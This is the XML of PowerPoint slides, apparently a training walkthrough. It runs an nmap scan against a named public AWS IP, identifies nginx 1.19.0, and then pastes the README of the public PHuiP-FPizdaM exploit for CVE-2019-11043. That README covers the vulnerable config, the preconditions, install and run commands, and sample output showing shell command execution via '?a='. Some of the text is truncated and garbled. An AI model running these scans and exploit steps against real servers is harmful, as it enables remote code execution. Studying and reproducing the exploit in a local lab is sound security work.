            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Host is up (0.28s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>CVSSV3.1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2275"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2275"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2.compute.amazonaws.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Not shown: 999 filtered tcp ports (no-response) CVE-ID: CVE-2022-417</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>PORT STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>CWE-ID: CWE-125-Ouch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>80/tcp open http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Exploit availability: No</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579D4145-592C-7683-5E51-77537E188EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="947738"/>
            <a:ext cx="5902325" cy="668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Nmap done: 1 IP address (1 host up) scanned in 21.04 seconds </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Take ip address of domain and nmap -sV 44.228.249.3 -p 80 nginx 1.0.7-1.23.1 $ nmap -sV 44.228.249.3 -p 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Starting Nmap 7.94 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>) at 2023-07-14 13:51 IST ec2-44-228-249-3.us-west-2.compute.amazonaws.com (44.228.249.3) Nmap scan report for Host is up (0.30s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>PORT STATE SERVICE VERSION 80/tcp open http nginx 1.19.0 che 2.3 an External links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="625"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Service detection performed. Please report any incorrect results at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://nmap.org/submit/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="5875"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Nmap done: 1 IP address (1 host up) scanned in 23.10 seconds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4041246D-ECF3-6795-CB62-593F35C56418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="8763000"/>
            <a:ext cx="546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5875"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a: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5" name="arrow.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38BA9428-6E9D-57B8-803D-84C756BF8253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="990600"/>
            <a:ext cx="5938838" cy="845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Step -4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>Copied the version nginx 1.19.0 and Pasted it in google The results is # PHuiP-FPizdaM ## What's this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see [below](#the-full-list-of-preconditions)).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>## What's vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>If a webserver runs nginx + php-fpm and nginx have a configuration like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>location ~ [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" baseline="30000"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>/]\.php(/|$) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>• • •</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>fastcgi_split_path_info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" baseline="30000"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>}which also lacks any script existence checks (like try_files), then you can probably hack it with this sploit.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0B2A585B-7D1E-F394-2B7F-74E2D0F75185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="950913"/>
            <a:ext cx="5972175" cy="65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263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>#### The full list of preconditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>1.    Nginx + php-fpm, location ~ [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" baseline="30000"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>/]\.php(/|$] must be forwarded to php-fpm (maybe the regexp can be stricter, see [#1](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/neex/phuip-fpizdam/issues/1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>)).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2.    The fastcgi_split_path_info directive must be there and contain a regexp starting with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" baseline="30000"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> and ending with $, so we can break it with a newline character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>3.    There must be a PATH_INFO variable assignment via statement fastcgi_param PATH_INFO $fastcgi_path_info;. At first, we thought it is always present in the fastcgi_params file, but it's not true.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>4.    No file existence checks like try_files $uri =404 or if (-f $uri). If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2275"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>5.    This exploit works only for PHP 7+, but the bug itself is present in earlier versions (see [below](#about-php5)).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>## Isn't this known to be vulnerable for years?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="2725"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>A long time ago php-fpm didn't restrict the extensions of the scripts, meaning that something like /avatar.png/some-fake-shit.php could execute avatar.png as a PHP script. This issue was fixed around 2010.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D857444B-195B-4081-566A-6D1FC5F5BE9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="8083550"/>
            <a:ext cx="58594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50"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2725"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>The current one doesn't require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler.</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4" name="arrow.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E55A24CB-FFC6-239B-DE1D-FB18F8B6FDB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="963613"/>
            <a:ext cx="12192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263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>## How to run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02723411-A080-9D8F-0C55-C1D5635705E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="1368425"/>
            <a:ext cx="5926138" cy="743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1263"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Install it using</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>go get github.com/neex/phuip-fpizdam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>If you get strange compilation errors, make sure you're using go &gt;= 1.13. Run the program using phuip-fpizdam [url] (assuming you have the $GOPATH/bin inside your $PATH, otherwise specify the full path to the binary). Good output looks like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:15 Base status code is 200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:15 Status code 500 for qsl=1745, adding as a candidate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:15 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2275"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:16 Attack params found: --qsl 1735 --pisos 126 --skip-detect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:16 Trying to set "session.auto_start=0"...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:16 Detect() returned attack params: --qsl 1735 --pisos 126 --skip-detect &lt;-- REMEMBER THIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:16 Performing attack using php.ini settings...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:40 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&amp;" to URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:40 Trying to cleanup /tmp/a...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2019/10/01 02:46:40 Done!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CBE83C42-4581-96B5-66DB-41146DE801C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="950913"/>
            <a:ext cx="5962650" cy="804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2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>'After this, you can start appending '?a=&lt;your command&gt;' to all PHP scripts (you may need multiple retries).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>## Playground environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>If you want to reproduce the issue or play with the exploit locally, do the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>1.    Clone this repo and go to the 'reproducer' directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2.    Create the docker image using 'docker build -t reproduce-cve-2019-11043 .'. It takes a long time as it internally clones the php repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>2.    Run the docker using 'docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>3.    Now you have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://127.0.0.1:8080/script.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>, which is an empty file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>4.    Run the exploit using 'phuip-fpizdam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://127.0.0.1:8080/script.php'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>5.    If everything is ok, you'll be able to execute commands by appending '?a=' to the script: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://127.0.0.1:8080/script.php?a=id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>. Try multiple times as only some of php-fpm workers are infected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>## About PHP5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>The buffer underflow in php-fpm is present in PHP version 5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>However, this exploit makes use of an optimization used for storing FastCGI variables, [_fcgi_data_seg](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/php/php-</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7"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43E31E22-0E01-0B5A-8C46-528D94661E35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
